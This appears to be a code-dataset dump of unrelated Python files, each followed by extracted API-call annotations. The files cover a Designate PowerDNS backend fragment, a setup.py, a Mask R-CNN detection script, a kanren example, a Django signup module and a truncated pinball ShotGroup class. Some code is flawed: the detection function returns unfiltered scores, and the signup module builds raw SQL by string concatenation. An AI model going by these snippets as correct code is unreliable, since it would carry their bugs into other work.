exceptions\n'), ((5013, 5048), 'base64.b64encode', 'base64.b64encode', (["tsigkey['secret']"], {}), "(tsigkey['secret'])\n", (5029, 5048), False, 'import base64\n'), ((8555, 8587), 'sqlalchemy.sql.select', 'select', (['[tables.tsigkeys.c.name]'], {}), '([tables.tsigkeys.c.name])\n', (8561, 8587), False, 'from sqlalchemy.sql import select\n'), ((17605, 17649), 'designate.exceptions.RecordNotFound', 'exceptions.RecordNotFound', (['"""No record found"""'], {}), "('No record found')\n", (17630, 17649), False, 'from designate import exceptions\n'), ((3018, 3033), 'sqlalchemy.sql.select', 'select', (['[table]'], {}), '([table])\n', (3024, 3033), False, 'from sqlalchemy.sql import select\n'), ((3658, 3673), 'sqlalchemy.sql.select', 'select', (['[table]'], {}), '([table])\n', (3664, 3673), False, 'from sqlalchemy.sql import select\n'), ((3982, 3997), 'sqlalchemy.sql.select', 'select', (['[table]'], {}), '([table])\n', (3988, 3997), False, 'from sqlalchemy.sql import select\n'), ((6381, 6416), 'base64.b64encode', 'base64.b64encode', (["tsigkey['secret']"], {}), "(tsigkey['secret'])\n", (6397, 6416), False, 'import base64\n'), ((10834, 10857), 'designate.backend.impl_powerdns.tables.records.delete', 'tables.records.delete', ([], {}), '()\n', (10855, 10857), False, 'from designate.backend.impl_powerdns import tables\n'), ((11022, 11053), 'designate.backend.impl_powerdns.tables.domain_metadata.delete', 'tables.domain_metadata.delete', ([], {}), '()\n', (11051, 11053), False, 'from designate.backend.impl_powerdns import tables\n'), ((12368, 12391), 'designate.backend.impl_powerdns.tables.records.delete', 'tables.records.delete', ([], {}), '()\n', (12389, 12391), False, 'from designate.backend.impl_powerdns import tables\n'), ((17699, 17750), 'designate.exceptions.RecordNotFound', 'exceptions.RecordNotFound', (['"""Too many records found"""'], {}), "('Too many records found')\n", (17724, 17750), False, 'from designate import exceptions\n'), ((9075, 9112), 'designate.openstack.common.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (9110, 9112), False, 'from designate.openstack.common import excutils\n'), ((9559, 9582), 'designate.backend.impl_powerdns.tables.records.update', 'tables.records.update', ([], {}), '()\n', (9580, 9582), False, 'from designate.backend.impl_powerdns import tables\n'), ((9869, 9906), 'designate.openstack.common.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (9904, 9906), False, 'from designate.openstack.common import excutils\n'), ((11516, 11553), 'designate.openstack.common.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (11551, 11553), False, 'from designate.openstack.common import excutils\n'), ((12127, 12164), 'designate.openstack.common.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (12162, 12164), False, 'from designate.openstack.common import excutils\n'), ((7513, 7599), 'designate.i18n._LC', '_LC', (['"""Attempted to delete a TSIG key which is not present in the backend. ID: %s"""'], {}), "('Attempted to delete a TSIG key which is not present in the backend. ID: %s'\n )\n", (7516, 7599), False, 'from designate.i18n import _LC\n'), ((7705, 7736), 'designate.backend.impl_powerdns.tables.domain_metadata.delete', 'tables.domain_metadata.delete', ([], {}), '()\n', (7734, 7736), False, 'from designate.backend.impl_powerdns import tables\n'), ((10445, 10524), 'designate.i18n._LC', '_LC', (['"""Attempted to delete a domain which is not present in the backend. ID: %s"""'], {}), "('Attempted to delete a domain which is not present in the backend. ID: %s')\n", (10448, 10524), False, 'from designate.i18n import _LC\n'), ((14633, 14712), 'designate.i18n._LC', '_LC', (['"""Attempted to delete a record which is not present in the backend. ID: %s"""'], {}), "('Attempted to delete a record which is not present in the backend. ID: %s')\n", (14636, 14712), False, 'from designate.i18n import _LC\n'), ((15211, 15253), 'sqlalchemy.sql.select', 'select', (['[tables.domain_metadata.c.content]'], {}), '([tables.domain_metadata.c.content])\n', (15217, 15253), False, 'from sqlalchemy.sql import select\n'), ((6738, 6769), 'designate.backend.impl_powerdns.tables.domain_metadata.update', 'tables.domain_metadata.update', ([], {}), '()\n', (6767, 6769), False, 'from designate.backend.impl_powerdns import tables\n')]
|
from setuptools import (setup, find_namespace_packages)
from os import path
from pkg_resources import parse_version
from pyrsched.rpc import (NAME, VERSION)
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
LONG_DESCRIPTION = f.read()
setup(
name=NAME,
version=VERSION,
description="RPC client for pypyr-scheduler-server",
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
url=f"https://github.com/pypyr-scheduler/{NAME}",
license='MIT',
author='<NAME>',
author_email="<EMAIL>",
classifiers=[
'Intended Audience :: Developers',
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 3.7",
],
keywords=["Pypyr", "Scheduler", "Taskrunner"],
packages=find_namespace_packages(include=['pyrsched.*', ]),
namespace_packages=['pyrsched'],
include_package_data=True,
setup_requires=['pytest-runner'],
tests_require=['pytest'],
)
|
[
"setuptools.find_namespace_packages",
"os.path.dirname",
"os.path.join"
] |
[((179, 201), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (191, 201), False, 'from os import path\n'), ((214, 242), 'os.path.join', 'path.join', (['here', '"""README.md"""'], {}), "(here, 'README.md')\n", (223, 242), False, 'from os import path\n'), ((926, 973), 'setuptools.find_namespace_packages', 'find_namespace_packages', ([], {'include': "['pyrsched.*']"}), "(include=['pyrsched.*'])\n", (949, 973), False, 'from setuptools import setup, find_namespace_packages\n')]
|
import sys
sys.path.append('../src/')
import os
import numpy as np
from mask_rcnn.mrcnn import utils
import mask_rcnn.mrcnn.model as modellib
from mask_rcnn.samples.coco import coco
import cv2
import argparse as ap
class InferenceConfig(coco.CocoConfig):
# Set batch size to 1 since we'll be running inference on
# one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
GPU_COUNT = 1
IMAGES_PER_GPU = 1
def get_mask_rcnn(model, image, COCO_MODEL_PATH):
# Run detection
results = model.detect([image], verbose=1)
r = results[0]
idx = np.where(r['class_ids'] != 0) #select non-background
boxes = r['rois'][idx]
scores = r['scores'][idx]
classes = r['class_ids'][idx]
#score threshold = 0.7
idxs = np.where(scores > 0.7)
boxes = boxes[idxs]
people_scores = scores[idxs]
classes = classes[idxs]
return boxes, scores, classes
def run(read_direc, save_direc, model, COCO_MODEL_PATH, class_names, save_image=False):
if os.path.exists('./processed_images_mask.txt'):
with open('./processed_images_mask.txt', 'r') as f:
processed_files = f.readlines()
else:
processed_files = []
print('Started:', save_direc, read_direc)
if not os.path.exists(save_direc+'/'):
os.mkdir(save_direc+'/')
if save_image:
if not os.path.exists(save_direc+'/images_mask/'):
os.mkdir(save_direc + '/images_mask/')
i=0
for fi in os.listdir(read_direc):
if fi + '\n' in processed_files:
print('Skipping ', fi)
continue
image = cv2.imread(read_direc +fi)
#histogram equalization
image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
image[:,:,2] = cv2.equalizeHist(image[:,:,2])
image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)
i = i+1
if i % 1000 == 0:
print('Processed ' + str(i) + 'images')
scaler_y = np.shape(image)[0]/960
scaler_x = np.shape(image)[1]/540
image1 = cv2.resize(image, (540, 960))
mask_boxes, mask_scores, mask_classes = get_mask_rcnn(model, image1, COCO_MODEL_PATH)
for bbox, score, classid in zip(mask_boxes, mask_scores, mask_classes):
bbox[1] = int(bbox[1])*scaler_x
bbox[0] = int(bbox[0])*scaler_y
bbox[3] = int(bbox[3])*scaler_x
bbox[2] = int(bbox[2])*scaler_y
with open(save_direc+'/groundtruth_boxes_mask.txt', 'a') as f:
f.write(str(fi) + ' ' + str(bbox[1])+ ' ' + str(bbox[0]) + ' ' + str(bbox[3]) + ' ' + str(bbox[2]) + ' ' + str(score) + ' ' + class_names[classid] + '\n')
if save_image:
cv2.rectangle(image, (int(bbox[1]+1), int(bbox[0]+1)), (int(bbox[3]+1), int(bbox[2]+1)), (0,255,0), 3)
cv2.putText(image, class_names[classid], (round(float(bbox[1])), round(float(bbox[0]))), cv2.FONT_HERSHEY_SIMPLEX, 4,(0,0,255),10,cv2.LINE_AA)
with open('./processed_images_mask.txt', 'a') as f:
f.write(fi + '\n')
if save_image:
cv2.imwrite(save_direc+'/images_mask/' + str(i) + '.jpg', image)
if __name__ == '__main__':
parser = ap.ArgumentParser()
parser.add_argument('-r', "--readdir", help="Directory with images")
parser.add_argument('-s', "--savedir", help="Directory for saving the detection results")
parser.add_argument('-i', "--saveimage", action='store_true', help="Save image with predicted bounding box or not")
args = vars(parser.parse_args())
read_direc = args['readdir']
save_direc = args['savedir']
COCO_MODEL_PATH = "../src/models/mask_rcnn_coco.h5"
MODEL_DIR = os.path.join('mask_rcnn/', "logs")
class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'trafficlight',
'fire hydrant', 'stop sign', 'parkingmeter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sportsball',
'kite', 'baseballbat', 'baseballglove', 'skateboard',
'surfboard', 'tennisracket', 'bottle', 'wineglass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hotdog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'pottedplant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cellphone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddybear', 'hairdrier', 'toothbrush']
config = InferenceConfig()
# Create model object in inference mode.
model = modellib.MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=config)
# Load weights trained on MS-COCO
model.load_weights(COCO_MODEL_PATH, by_name=True)
run(read_direc, save_direc, model, COCO_MODEL_PATH, class_names, args['saveimage'])
print('Finished')
|
[
"sys.path.append",
"os.mkdir",
"cv2.equalizeHist",
"argparse.ArgumentParser",
"cv2.cvtColor",
"os.path.exists",
"numpy.shape",
"cv2.imread",
"numpy.where",
"mask_rcnn.mrcnn.model.MaskRCNN",
"os.path.join",
"os.listdir",
"cv2.resize"
] |
[((11, 37), 'sys.path.append', 'sys.path.append', (['"""../src/"""'], {}), "('../src/')\n", (26, 37), False, 'import sys\n'), ((591, 620), 'numpy.where', 'np.where', (["(r['class_ids'] != 0)"], {}), "(r['class_ids'] != 0)\n", (599, 620), True, 'import numpy as np\n'), ((831, 853), 'numpy.where', 'np.where', (['(scores > 0.7)'], {}), '(scores > 0.7)\n', (839, 853), True, 'import numpy as np\n'), ((1112, 1157), 'os.path.exists', 'os.path.exists', (['"""./processed_images_mask.txt"""'], {}), "('./processed_images_mask.txt')\n", (1126, 1157), False, 'import os\n'), ((1605, 1627), 'os.listdir', 'os.listdir', (['read_direc'], {}), '(read_direc)\n', (1615, 1627), False, 'import os\n'), ((3511, 3530), 'argparse.ArgumentParser', 'ap.ArgumentParser', ([], {}), '()\n', (3528, 3530), True, 'import argparse as ap\n'), ((4013, 4047), 'os.path.join', 'os.path.join', (['"""mask_rcnn/"""', '"""logs"""'], {}), "('mask_rcnn/', 'logs')\n", (4025, 4047), False, 'import os\n'), ((5501, 5572), 'mask_rcnn.mrcnn.model.MaskRCNN', 'modellib.MaskRCNN', ([], {'mode': '"""inference"""', 'model_dir': 'MODEL_DIR', 'config': 'config'}), "(mode='inference', model_dir=MODEL_DIR, config=config)\n", (5518, 5572), True, 'import mask_rcnn.mrcnn.model as modellib\n'), ((1389, 1421), 'os.path.exists', 'os.path.exists', (["(save_direc + '/')"], {}), "(save_direc + '/')\n", (1403, 1421), False, 'import os\n'), ((1429, 1455), 'os.mkdir', 'os.mkdir', (["(save_direc + '/')"], {}), "(save_direc + '/')\n", (1437, 1455), False, 'import os\n'), ((1779, 1806), 'cv2.imread', 'cv2.imread', (['(read_direc + fi)'], {}), '(read_direc + fi)\n', (1789, 1806), False, 'import cv2\n'), ((1871, 1909), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2HSV'], {}), '(image, cv2.COLOR_BGR2HSV)\n', (1883, 1909), False, 'import cv2\n'), ((1933, 1965), 'cv2.equalizeHist', 'cv2.equalizeHist', (['image[:, :, 2]'], {}), '(image[:, :, 2])\n', (1949, 1965), False, 'import cv2\n'), ((1980, 2018), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_HSV2BGR'], {}), '(image, cv2.COLOR_HSV2BGR)\n', (1992, 2018), False, 'import cv2\n'), ((2214, 2243), 'cv2.resize', 'cv2.resize', (['image', '(540, 960)'], {}), '(image, (540, 960))\n', (2224, 2243), False, 'import cv2\n'), ((1488, 1532), 'os.path.exists', 'os.path.exists', (["(save_direc + '/images_mask/')"], {}), "(save_direc + '/images_mask/')\n", (1502, 1532), False, 'import os\n'), ((1544, 1582), 'os.mkdir', 'os.mkdir', (["(save_direc + '/images_mask/')"], {}), "(save_direc + '/images_mask/')\n", (1552, 1582), False, 'import os\n'), ((2132, 2147), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (2140, 2147), True, 'import numpy as np\n'), ((2174, 2189), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (2182, 2189), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
from kanren import run, var, fact
from kanren.assoccomm import eq_assoccomm as eq
from kanren.assoccomm import commutative, associative
#define math operations
add = 'add'
mul = 'mul'
#define commutative/associative
fact(commutative, mul)
fact(commutative, add)
fact(associative, mul)
fact(associative, add)
#define variables
a, b = var('a'), var('b')
#Original pattern (5+a)*b
Original_pattern = (mul, (add, 5, a), b)
#Two Expressions
exp1 = (mul, (add,5,3), 4)
exp2 = (mul, 2, (add, 5, 1))
exp3 = (add, 5, (mul, 8, 1)) #(8*1+5)
#Output
print(run(0, (a,b), eq(Original_pattern, exp1)))
print(run(0, (a,b), eq(Original_pattern, exp2)))
print(run(0, (a,b), eq(Original_pattern, exp3)))
|
[
"kanren.assoccomm.eq_assoccomm",
"kanren.var",
"kanren.fact"
] |
[((242, 264), 'kanren.fact', 'fact', (['commutative', 'mul'], {}), '(commutative, mul)\n', (246, 264), False, 'from kanren import run, var, fact\n'), ((265, 287), 'kanren.fact', 'fact', (['commutative', 'add'], {}), '(commutative, add)\n', (269, 287), False, 'from kanren import run, var, fact\n'), ((288, 310), 'kanren.fact', 'fact', (['associative', 'mul'], {}), '(associative, mul)\n', (292, 310), False, 'from kanren import run, var, fact\n'), ((311, 333), 'kanren.fact', 'fact', (['associative', 'add'], {}), '(associative, add)\n', (315, 333), False, 'from kanren import run, var, fact\n'), ((360, 368), 'kanren.var', 'var', (['"""a"""'], {}), "('a')\n", (363, 368), False, 'from kanren import run, var, fact\n'), ((370, 378), 'kanren.var', 'var', (['"""b"""'], {}), "('b')\n", (373, 378), False, 'from kanren import run, var, fact\n'), ((589, 615), 'kanren.assoccomm.eq_assoccomm', 'eq', (['Original_pattern', 'exp1'], {}), '(Original_pattern, exp1)\n', (591, 615), True, 'from kanren.assoccomm import eq_assoccomm as eq\n'), ((638, 664), 'kanren.assoccomm.eq_assoccomm', 'eq', (['Original_pattern', 'exp2'], {}), '(Original_pattern, exp2)\n', (640, 664), True, 'from kanren.assoccomm import eq_assoccomm as eq\n'), ((687, 713), 'kanren.assoccomm.eq_assoccomm', 'eq', (['Original_pattern', 'exp3'], {}), '(Original_pattern, exp3)\n', (689, 713), True, 'from kanren.assoccomm import eq_assoccomm as eq\n')]
|
import random
import string
from datetime import datetime
import json
from signup import db
from signup import emails
from mailgun import api as mailgun_api
from sequence import models as sequence_model
def create_signup( email, questions ):
""" Add signup to the current sequence """
sequence = sequence_model.get_current_sequence_number()
if db.UserSignup.objects.filter(email__iexact=email, sequence=sequence).exists():
raise Exception('Signup already exists')
invite_code=''.join([
random.choice(string.letters+string.digits) for i in range(32)
])
now = datetime.utcnow()
signup = db.UserSignup(
email=email,
invite_code=invite_code,
questions=json.dumps(questions),
sequence=sequence,
date_added=now,
date_updated=now
)
signup.save()
return _signup2json(signup)
def update_signup( email, questions ):
""" Update the signup if it exists for the current sequence. If the signup was previously delete it will be undeleted """
sequence = sequence_model.get_current_sequence_number()
signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence)
old_questions = json.loads(signup_db.questions)
for key, value in questions.items():
old_questions[key] = value
signup_db.questions = json.dumps(old_questions)
signup_db.date_updated = datetime.utcnow()
signup_db.date_deleted = None
signup_db.save()
return _signup2json(signup_db)
def create_or_update_signup( email, questions ):
# check if user is already added to the current sequence
sequence = sequence_model.get_current_sequence_number()
if db.UserSignup.objects.filter(email__iexact=email, sequence=sequence).exists():
return update_signup(email, questions)
else:
return create_signup(email, questions)
def delete_signup( email, sequence ):
if db.UserSignup.objects.filter(email__iexact=email, sequence=sequence, date_deleted__isnull=False).exists():
raise Exception('Signup already deleted')
signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence)
signup_db.date_deleted = datetime.utcnow()
signup_db.save()
def _signup2json( signup_db ):
signup = {
'email': signup_db.email,
'questions': json.loads(signup_db.questions),
'sequence': signup_db.sequence,
'date_created': signup_db.date_added,
'date_updated': signup_db.date_updated,
'date_deleted': signup_db.date_deleted,
'key': signup_db.invite_code
}
return signup
def get_signup( email, sequence ):
if not db.UserSignup.objects.filter(email__iexact=email, sequence=sequence, date_deleted__isnull=True).exists():
raise Exception(u'Signup for {0} not found'.format(email))
signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence, date_deleted__isnull=True)
return _signup2json(signup_db)
def get_all_user_signups( email ):
signups = db.UserSignup.objects.filter(email__iexact=email, date_deleted__isnull=True)
return [ _signup2json(su) for su in signups ]
def get_signup_by_invite_code( invite_code ):
user_set = db.UserSignup.objects.filter(
invite_code=invite_code,
date_deleted__isnull=True
)
if not user_set.exists():
raise Exception()
return _signup2json(user_set[0])
def get_signups( sequence ):
signups = db.UserSignup.objects.filter(date_deleted__isnull=True)
if sequence:
signups = signups.filter(sequence=sequence)
return [_signup2json(signup) for signup in signups]
def get_signups_for_archiving( sequence ):
""" Only use this for archiving."""
sequence = int(sequence)
# TODO this is messy!
signups = db.UserSignup.objects.raw('select distinct on (email) * from signup_usersignup where sequence= '+ str(sequence) +' order by email, date_added DESC;')
return [_signup2json(signup) for signup in signups]
def get_new_signups( ):
""" get signups where the welcome email hasn't been sent yet """
signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)
return [_signup2json(signup) for signup in signups]
def handle_new_signups( ):
""" Send welcome email to new users.
Add them to a general mailing list.
Update db when done. """
signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)[:500]
while len(signups):
#TODO emails.send_welcome_emails([signup.email for signup in signups])
for signup in signups:
add_user_to_global_list(signup.email, signup.sequence)
#make sure new signups aren't in the mailgun blocked list
mailgun_api.delete_all_unsubscribes(signup.email)
db.UserSignup.objects.filter(id__in=signups.values('id')).update(date_tasks_handled=datetime.utcnow())
signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)[:500]
def add_user_to_global_list( email, sequence ):
""" add user to email list that gets all emails """
signup_db = db.UserSignup.objects.get(
email__iexact=email, date_deleted__isnull=True, sequence=sequence
)
if signup_db.sequence:
list_name = sequence_model.sequence_list_name(signup_db.sequence)
mailgun_api.add_list_member(list_name, email)
|
[
"signup.db.UserSignup.objects.get",
"json.loads",
"mailgun.api.delete_all_unsubscribes",
"random.choice",
"json.dumps",
"datetime.datetime.utcnow",
"sequence.models.sequence_list_name",
"signup.db.UserSignup.objects.filter",
"sequence.models.get_current_sequence_number",
"mailgun.api.add_list_member"
] |
[((308, 352), 'sequence.models.get_current_sequence_number', 'sequence_model.get_current_sequence_number', ([], {}), '()\n', (350, 352), True, 'from sequence import models as sequence_model\n'), ((602, 619), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (617, 619), False, 'from datetime import datetime\n'), ((1057, 1101), 'sequence.models.get_current_sequence_number', 'sequence_model.get_current_sequence_number', ([], {}), '()\n', (1099, 1101), True, 'from sequence import models as sequence_model\n'), ((1118, 1183), 'signup.db.UserSignup.objects.get', 'db.UserSignup.objects.get', ([], {'email__iexact': 'email', 'sequence': 'sequence'}), '(email__iexact=email, sequence=sequence)\n', (1143, 1183), False, 'from signup import db\n'), ((1205, 1236), 'json.loads', 'json.loads', (['signup_db.questions'], {}), '(signup_db.questions)\n', (1215, 1236), False, 'import json\n'), ((1340, 1365), 'json.dumps', 'json.dumps', (['old_questions'], {}), '(old_questions)\n', (1350, 1365), False, 'import json\n'), ((1395, 1412), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (1410, 1412), False, 'from datetime import datetime\n'), ((1630, 1674), 'sequence.models.get_current_sequence_number', 'sequence_model.get_current_sequence_number', ([], {}), '()\n', (1672, 1674), True, 'from sequence import models as sequence_model\n'), ((2085, 2150), 'signup.db.UserSignup.objects.get', 'db.UserSignup.objects.get', ([], {'email__iexact': 'email', 'sequence': 'sequence'}), '(email__iexact=email, sequence=sequence)\n', (2110, 2150), False, 'from signup import db\n'), ((2180, 2197), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2195, 2197), False, 'from datetime import datetime\n'), ((2840, 2936), 'signup.db.UserSignup.objects.get', 'db.UserSignup.objects.get', ([], {'email__iexact': 'email', 'sequence': 'sequence', 'date_deleted__isnull': '(True)'}), '(email__iexact=email, sequence=sequence,\n date_deleted__isnull=True)\n', (2865, 2936), False, 'from signup import db\n'), ((3024, 3100), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'email__iexact': 'email', 'date_deleted__isnull': '(True)'}), '(email__iexact=email, date_deleted__isnull=True)\n', (3052, 3100), False, 'from signup import db\n'), ((3214, 3299), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'invite_code': 'invite_code', 'date_deleted__isnull': '(True)'}), '(invite_code=invite_code, date_deleted__isnull=True\n )\n', (3242, 3299), False, 'from signup import db\n'), ((3456, 3511), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'date_deleted__isnull': '(True)'}), '(date_deleted__isnull=True)\n', (3484, 3511), False, 'from signup import db\n'), ((4106, 4198), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'date_tasks_handled__isnull': '(True)', 'date_deleted__isnull': '(True)'}), '(date_tasks_handled__isnull=True,\n date_deleted__isnull=True)\n', (4134, 4198), False, 'from signup import db\n'), ((5188, 5284), 'signup.db.UserSignup.objects.get', 'db.UserSignup.objects.get', ([], {'email__iexact': 'email', 'date_deleted__isnull': '(True)', 'sequence': 'sequence'}), '(email__iexact=email, date_deleted__isnull=True,\n sequence=sequence)\n', (5213, 5284), False, 'from signup import db\n'), ((2326, 2357), 'json.loads', 'json.loads', (['signup_db.questions'], {}), '(signup_db.questions)\n', (2336, 2357), False, 'import json\n'), ((4413, 4505), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'date_tasks_handled__isnull': '(True)', 'date_deleted__isnull': '(True)'}), '(date_tasks_handled__isnull=True,\n date_deleted__isnull=True)\n', (4441, 4505), False, 'from signup import db\n'), ((5342, 5395), 'sequence.models.sequence_list_name', 'sequence_model.sequence_list_name', (['signup_db.sequence'], {}), '(signup_db.sequence)\n', (5375, 5395), True, 'from sequence import models as sequence_model\n'), ((5404, 5449), 'mailgun.api.add_list_member', 'mailgun_api.add_list_member', (['list_name', 'email'], {}), '(list_name, email)\n', (5431, 5449), True, 'from mailgun import api as mailgun_api\n'), ((360, 428), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'email__iexact': 'email', 'sequence': 'sequence'}), '(email__iexact=email, sequence=sequence)\n', (388, 428), False, 'from signup import db\n'), ((522, 567), 'random.choice', 'random.choice', (['(string.letters + string.digits)'], {}), '(string.letters + string.digits)\n', (535, 567), False, 'import random\n'), ((720, 741), 'json.dumps', 'json.dumps', (['questions'], {}), '(questions)\n', (730, 741), False, 'import json\n'), ((1682, 1750), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'email__iexact': 'email', 'sequence': 'sequence'}), '(email__iexact=email, sequence=sequence)\n', (1710, 1750), False, 'from signup import db\n'), ((1912, 2012), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'email__iexact': 'email', 'sequence': 'sequence', 'date_deleted__isnull': '(False)'}), '(email__iexact=email, sequence=sequence,\n date_deleted__isnull=False)\n', (1940, 2012), False, 'from signup import db\n'), ((4791, 4840), 'mailgun.api.delete_all_unsubscribes', 'mailgun_api.delete_all_unsubscribes', (['signup.email'], {}), '(signup.email)\n', (4826, 4840), True, 'from mailgun import api as mailgun_api\n'), ((4971, 5063), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'date_tasks_handled__isnull': '(True)', 'date_deleted__isnull': '(True)'}), '(date_tasks_handled__isnull=True,\n date_deleted__isnull=True)\n', (4999, 5063), False, 'from signup import db\n'), ((2650, 2749), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'email__iexact': 'email', 'sequence': 'sequence', 'date_deleted__isnull': '(True)'}), '(email__iexact=email, sequence=sequence,\n date_deleted__isnull=True)\n', (2678, 2749), False, 'from signup import db\n'), ((4934, 4951), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (4949, 4951), False, 'from datetime import datetime\n')]
|
"""Contains the ShotGroup base class."""
from collections import deque
from mpf.core.device_monitor import DeviceMonitor
from mpf.core.events import event_handler
from mpf.core.mode import Mode
from mpf.core.mode_device import ModeDevice
from mpf.core.player import Player
@DeviceMonitor("common_state", "rotation_enabled")
class ShotGroup(ModeDevice):
"""Represents a group of shots in a pinball machine by grouping together multiple `Shot` class devices.
This is used so you get get
"group-level" functionality, like shot rotation, shot group completion,
etc. This would be used for a group of rollover lanes, a bank of standups,
etc.
"""
config_section = 'shot_groups'
collection = 'shot_groups'
class_label = 'shot_group'
__slots__ = ["rotation_enabled", "profile", "rotation_pattern"]
def __init__(self, machine, name):
"""Initialise shot group."""
super().__init__(machine, name)
self.rotation_enabled = None
self.profile = None
self.rotation_pattern = None
def add_control_events_in_mode(self, mode) -> None:
"""Remove enable here."""
def device_loaded_in_mode(self, mode: Mode, player: Player):
"""Add device in mode."""
super().device_loaded_in_mode(mode, player)
self._check_for_complete()
self.profile = self.config['shots'][0].profile
self.rotation_pattern = deque(self.profile.config['rotation_pattern'])
self.rotation_enabled = not self.config['enable_rotation_events']
for shot in self.config['shots']:
self.machine.events.add_handler("{}_hit".format(shot.name), self._hit)
def device_removed_from_mode(self, mode):
"""Disable device when mode stops."""
super().device_removed_from_mode(mode)
self.machine.events.remove_handler(self._hit)
@property
def common_state(self):
"""Return common state if all shots in this group are in the same state.
Will return None otherwise.
"""
state = self.config['shots'][0].state_name
for shot in self.config['shots']:
if state != shot.state_name:
# shots do not have a common state
return None
return state
def _check_for_complete(self):
"""Check if all shots in this group are in the same state."""
state = self.common_state
if not state:
# shots do not have a common state
return
# if we reached this point we got a common state
self.debug_log(
"Shot group is complete with state: %s", state)
self.machine.events.post('{}_complete'.format(self.name), state=state)
'''event: (name)_complete
desc: All the member shots in the shot group called (name)
are in the same state.
args:
state: name of the common state of all shots.
'''
self.machine.events.post('{}_{}_complete'.format(self.name, state))
'''event: (name)_(state)_complete
desc: All the member shots in the shot group called (name)
are in the same state named (state).
'''
@event_handler(2)
def event_enable(self, **kwargs):
"""Handle enable control event."""
del kwargs
self.enable()
def enable(self):
"""Enable all member shots."""
for shot in self.config['shots']:
shot.enable()
@event_handler(3)
def event_disable(self, **kwargs):
"""Handle disable control event."""
del kwargs
self.disable()
def disable(self):
"""Disable all member shots."""
for shot in self.config['shots']:
shot.disable()
@event_handler(1)
def event_reset(self, **kwargs):
"""Handle reset control event."""
del kwargs
self.reset()
def reset(self):
"""Reset all member shots."""
for shot in self.config['shots']:
shot.reset()
@event_handler(4)
def event_restart(self, **kwargs):
"""Handle restart control event."""
del kwargs
self.restart()
def restart(self):
"""Restart all member shots."""
for shot in self.config['shots']:
shot.restart()
def _hit(self, advancing, **kwargs):
"""One of the member shots in this shot group was hit.
Args:
kwarg: {
profile: the current profile of the member shot that was hit
state: the current state of the member shot that was hit
advancing: boolean of whether the state is advancing
}
"""
if advancing:
self._check_for_complete()
self.machine.events.post(self.name + '_hit')
'''event: (name)_hit
desc: A member shots in the shot group called (name)
has been hit.
'''
self.machine.events.post("{}_{}_hit".format(self.name, kwargs['state']))
'''event: (name)_(state)_hit
desc: A member shot with state (state) in the shot group (name)
has been hit.
'''
@event_handler(9)
def event_enable_rotation(self, **kwargs):
"""Handle enable_rotation control event."""
del kwargs
self.enable_rotation()
def enable_rotation(self):
"""Enable shot rotation.
If disabled, rotation events do not actually rotate the shots.
"""
self.debug_log('Enabling rotation')
self.rotation_enabled = True
@event_handler(2)
def event_disable_rotation(self, **kwargs):
"""Handle disable rotation control event."""
del kwargs
self.disable_rotation()
def disable_rotation(self):
"""Disable shot rotation.
If disabled, rotation events do not actually rotate the shots.
"""
self.debug_log('Disabling rotation')
self.rotation_enabled = False
@event_handler(4)
def event_rotate(self, direction=None, **kwargs):
"""Handle rotate control event."""
del kwargs
self.rotate(direction)
def rotate(self, direction=None):
"""Rotate (or "shift") the state of all the shots in this group.
This is used for things like lane change, where hitting the flipper
button shifts all the states of the shots in the group to the left or
right.
This method actually transfers the current state of each shot profile
